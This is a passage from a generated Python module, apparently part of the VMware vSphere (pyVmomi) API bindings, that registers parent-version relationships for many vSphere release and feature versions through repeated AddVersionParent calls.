# original declaration order (AddVersionParent is defined earlier in this
# generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.hostCertificateManagement",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.hostCertificateManagement", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.vmMisc", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.vmMisc",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.vmMisc", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Register the full parent set of vim.version.VLCM_QuickLaunchPreload
# (including itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.VLCM_QuickLaunchPreload",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VLCM_QuickLaunchPreload", _parent)
# Register the full parent set of vim.version.LSI2PVSCSI (including
# itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.LSI2PVSCSI",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.LSI2PVSCSI", _parent)
# Register the full parent set of vim.version.ProvisioningEventRefresh
# (including itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.ProvisioningEventRefresh",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.ProvisioningEventRefresh", _parent)
# Register the full parent set of vim.version.OVF_SINGLEDEPLOY_API
# (including itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.OVF_SINGLEDEPLOY_API",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.OVF_SINGLEDEPLOY_API", _parent)
# Register the full parent set of vim.version.v7_0_2_0 (including
# itself). Note: this release version lists no post-7.0.2 versions
# (no v7_0_3_* / v8_0_0_0) among its parents.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v7_0_2_0", _parent)
# Register the full parent set of vim.version.pr1803450 (including
# itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.pr1803450",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.pr1803450", _parent)
# Register the full parent set of vim.version.v7_0_2_1 (including
# itself and its predecessor v7_0_2_0). Note: no post-7.0.2 versions
# (no v7_0_3_* / v8_0_0_0) appear among its parents.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v7_0_2_1", _parent)
# Register the full parent set of vim.version.VMcrypt_OnlineVMEncryption
# (including itself and the related VMcrypt_IntegrityProtection feature
# version), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.VMcrypt_IntegrityProtection",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.VMcrypt_OnlineVMEncryption",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VMcrypt_OnlineVMEncryption", _parent)
# Register the full parent set of vim.version.FT_VBS_SUPPORT (including
# itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.FT_VBS_SUPPORT",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.FT_VBS_SUPPORT", _parent)
# Register the full parent set of vim.version.WCP_FaultDomains
# (including itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.WCP_FaultDomains",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.WCP_FaultDomains", _parent)
# Register the full parent set of vim.version.dnd (including itself),
# preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.dnd",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.dnd", _parent)
# Register the full parent set of vim.version.optional_virtual_disks
# (including itself), preserving the generated registration order.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.optional_virtual_disks",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.optional_virtual_disks", _parent)
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.hwh2_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version0")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version1")
AddVersionParent("vim.version.hwh2_0", "vmodl.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.hwh2_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hwh2_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.version13")
AddVersionParent("vim.version.hwh2_0", "vim.version.version14")
AddVersionParent("vim.version.hwh2_0", "vim.version.version15")
AddVersionParent("vim.version.hwh2_0", "vim.version.version10")
AddVersionParent("vim.version.hwh2_0", "vim.version.version11")
AddVersionParent("vim.version.hwh2_0", "vim.version.version12")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hwh2_0", "vim.version.hwh2_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.v7_0")
AddVersionParent("vim.version.hwh2_0", "vim.version.version8")
AddVersionParent("vim.version.hwh2_0", "vim.version.version9")
AddVersionParent("vim.version.hwh2_0", "vim.version.version6")
AddVersionParent("vim.version.hwh2_0", "vim.version.version7")
AddVersionParent("vim.version.hwh2_0", "vim.version.version1")
AddVersionParent("vim.version.hwh2_0", "vim.version.version4")
AddVersionParent("vim.version.hwh2_0", "vim.version.version5")
AddVersionParent("vim.version.hwh2_0", "vim.version.version2")
AddVersionParent("vim.version.hwh2_0", "vim.version.version3")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0_1_0", "vim.version.version3")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version4")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version3")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.query.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v6_9_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v6_8_7")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version13")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version14")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version15")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version10")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version11")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version12")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.v7_0")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version8")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version9")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version6")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version7")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version1")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version4")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version5")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version3")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version4")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version3")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version0")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v6_9_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v6_8_7")
AddVersionParent("vim.version.EventsOrdering", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version13")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version14")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version15")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version10")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version11")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version12")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.EventsOrdering")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version8")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version9")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version6")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version7")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version4")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version5")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version3")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version4")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version3")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version2")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version0")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version1")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.v6_9_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.PMemV2", "vim.version.v6_8_7")
AddVersionParent("vim.version.PMemV2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.PMemV2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.PMemV2", "vim.version.version13")
AddVersionParent("vim.version.PMemV2", "vim.version.version14")
AddVersionParent("vim.version.PMemV2", "vim.version.version15")
AddVersionParent("vim.version.PMemV2", "vim.version.version10")
AddVersionParent("vim.version.PMemV2", "vim.version.version11")
AddVersionParent("vim.version.PMemV2", "vim.version.version12")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.PMemV2", "vim.version.PMemV2")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0")
AddVersionParent("vim.version.PMemV2", "vim.version.version8")
AddVersionParent("vim.version.PMemV2", "vim.version.version9")
AddVersionParent("vim.version.PMemV2", "vim.version.version6")
AddVersionParent("vim.version.PMemV2", "vim.version.version7")
AddVersionParent("vim.version.PMemV2", "vim.version.version1")
AddVersionParent("vim.version.PMemV2", "vim.version.version4")
AddVersionParent("vim.version.PMemV2", "vim.version.version5")
AddVersionParent("vim.version.PMemV2", "vim.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.version3")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0", "vmodl.version.version1")
